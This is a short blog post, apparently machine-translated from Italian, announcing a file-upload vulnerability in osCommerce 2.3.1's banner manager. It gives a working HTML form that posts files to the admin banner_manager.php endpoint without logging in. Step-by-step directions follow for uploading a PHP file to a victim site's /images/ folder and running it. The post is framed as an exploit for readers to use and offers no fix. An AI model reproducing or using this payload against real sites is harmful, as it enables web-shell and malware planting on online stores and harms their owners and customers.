[EXPLOIT] - 2.3.1 Remote File Upload Vulnerability OsCommerce

How ricordete the last time I was appointed the ecommerce OsCommerce on this site was to report a serious vulnerability in all versions. The flaw was present in different versions of OsCommerce ZenCart as derived by the same.

After 2 years, programmers, after a long inaction, have released 2 new versions: the new 2.3.1 and 3.0.1. The release of two new versions did not have much prominence and among users of this application a few have updated.

On May 14, however, a new flaw was discovered (unfortunately very similar to the previous one) that allows the upload of files in the folder "/ images" without having to use special techniques or steal data administrator.

As reported here the component Banner (banner_manager.php) the new version 2.3.1 of OsCommerce suffers from a vulnerability that lets you upload files on the site "victim" on your PC by simply creating an html page with the following code:

  <form name="new_banner" action="http://site/path/admin/banner_manager.php/login.php?action=insert" method="post" enctype="multipart/form-data"> <br>
 <input type="file" name="banners_image"> <br>
 <input name="submit" value=" Save "type="submit"> </ form> 

Just replace "site / path" rule and any subfolder of the site based on this CMS, and save the file format. "Html".

Simply open your browser and you arrive to a file upload form.

Choose your file and click upload and once finished you can query the file by calling the url as follows:

http:// site / path / images / <fileinviato.php>

Analyzing some cases of use of the vulnerability I found cases of injection of virus / malware as already found also in 2009.

As soon as I will provide more information to keep you updated.

Similar Items:

Open Redirect and XSS vulnerabilities for Google ...

Interview: 10 questions to pr0_alpha_team (aka. ..

Joomla 1.7.3 and 1.5.25: Security Release!